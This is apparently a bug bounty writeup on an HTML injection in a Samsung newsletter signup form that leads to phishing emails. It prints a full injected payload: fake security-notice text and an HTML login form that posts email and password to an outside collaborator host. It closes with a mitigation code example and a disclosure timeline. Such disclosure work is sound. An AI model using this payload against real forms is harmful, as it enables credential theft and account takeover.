HTMLI to ATO leads to $$$ bounty 🤑
Hello Hackers, in this writeup I am going to discuss my recent finding on Samsung: how I found the bug and how, as a reward, they awarded me $$$ for it. This was my second bounty and my first one in dollars 🥳. So let’s dive into the vulnerability.
While testing Samsung, I first ran various Google dorks.
NOTE: If you want to learn about dorking (Shodan, Google and more), you can learn it from the writeups of my best friend and mentor AbhirupKonwar, which include lots of unique techniques you can use during bug hunting.


That is how I came across the subdomain https://www.samsungdeveloperconference.com/, which has a Newsletter subscription form where the user enters their first name, last name and email to subscribe. The page looks like this:

To test for HTML injection I simply entered my email address, put payloads into the first name and last name fields and clicked Subscribe. Guess what: the payload worked, and I had HTML injection in the confirmation email. To demonstrate impact, I showed them a full working PoC of phishing leading to ATO.
Payload in first name:
Dear Team
As part of our commitment to security, we have logged you out of your accounts due to recent updates in our system protocols. To ensure the safety and integrity of your account, please re-login using the secure link provided below.
<html>
<body>
<form action="https://burpcolloborator.com">Login again for security:<br><br>
<label for="u">Email id:
<input type="text" id="u" name="u"><br><br>
<label for="p">Password:
<input type="password" id="p" name="p"><br></br>
<input type="submit" value="Submit">
</body>
</html>
Payload in last name:
If you encounter any issues or have questions, feel free to reach out to our IT support team at. We appreciate your cooperation in keeping our systems secure.
Thank you for your understanding.
Best Regards,
Samsung Developer
<!--
The email with the malicious payload looks like this:

Now, when the victim enters their email and password, the attacker easily gets the victim’s credentials and can take over the victim’s account. Note that the mail comes from a Samsung email address, which further increases the victim’s trust and makes them more likely to enter their credentials.
After reporting, the Samsung team had a good response time and awarded me a $$$ bounty 🤑 for the report, but marked it as LOW severity 🤔. I think this should be at least P3 or medium severity, don’t you think?

Mitigation of HTMLI:
As a mitigation for this bug, the Samsung team implemented a proper whitelist of allowed characters and proper checks for characters such as >, <, ., ,, ”, ’, %, etc. These checks were implemented not only on the client side but also on the server side, so bypassing this bug is now next to impossible.
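Below is an added example of the two-layer fix described above (my own code, not Samsung’s): a server-side allow-list check on the name fields plus HTML-escaping before the value lands in the email template. The allow-list rule, the template and the injected sample input are constructed assumptions.

```python
import html

# Added example, not Samsung's code: the allow-list rule is an assumption
# (letters in any script plus space, apostrophe and hyphen, 1-50 chars).
MAX_NAME_LEN = 50
ALLOWED_PUNCT = set(" '-")

# Constructed newsletter template; str.format() on raw input is the
# pattern that produced the injection in the writeup.
TEMPLATE = (
    "<p>Hello {first} {last},</p>"
    "<p>Thanks for subscribing to the newsletter.</p>"
)


def validate_name(value: str) -> bool:
    """Server-side allow-list check for a first/last name field."""
    value = value.strip()
    if not 1 <= len(value) <= MAX_NAME_LEN:
        return False
    # Anything that is not a letter or an allowed name character is
    # rejected, which covers < > " % and the '<!--' comment opener.
    return all(ch.isalpha() or ch in ALLOWED_PUNCT for ch in value)


def render_vulnerable(first: str, last: str) -> str:
    """The bug: user input dropped straight into the HTML email body."""
    return TEMPLATE.format(first=first, last=last)


def render_safe(first: str, last: str) -> str:
    """Fix: reject on allow-list failure, then HTML-escape what remains
    so an allowed apostrophe can never break out of the markup."""
    if not (validate_name(first) and validate_name(last)):
        raise ValueError("name contains characters outside the allow-list")
    return TEMPLATE.format(
        first=html.escape(first.strip(), quote=True),
        last=html.escape(last.strip(), quote=True),
    )


# Constructed input modelled on the writeup: markup in the name fields.
INJECTED_FIRST = 'Dear Team <form action="https://attacker.invalid">'
INJECTED_LAST = "<!--"
```

Running `render_vulnerable(INJECTED_FIRST, INJECTED_LAST)` reproduces the raw markup in the email body, while `render_safe` raises before any template is rendered.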
Timeline:
2024-11-13: Reported
2024-11-26: Confirmed the bug was valid
2024-12-13: I told them that the fix was already deployed and asked for updates
2024-12-18: They confirmed that the fix was deployed and marked the severity as LOW
2025-01-06: Assured me that the Bugcrowd team would contact me soon and decided to award me $$$ 🤑
2025-01-11: Asked them to recheck the severity and suggested increasing it to P3.
2025-01-16: They declined to increase the severity.
2025-02-17: Awarded my very first bounty in $$$ 🥳

I hope you found this writeup helpful and that it motivates you to hunt more; consistency and persistence are the main keys in this field. I will see you in the next amazing one. Till then, bye 👋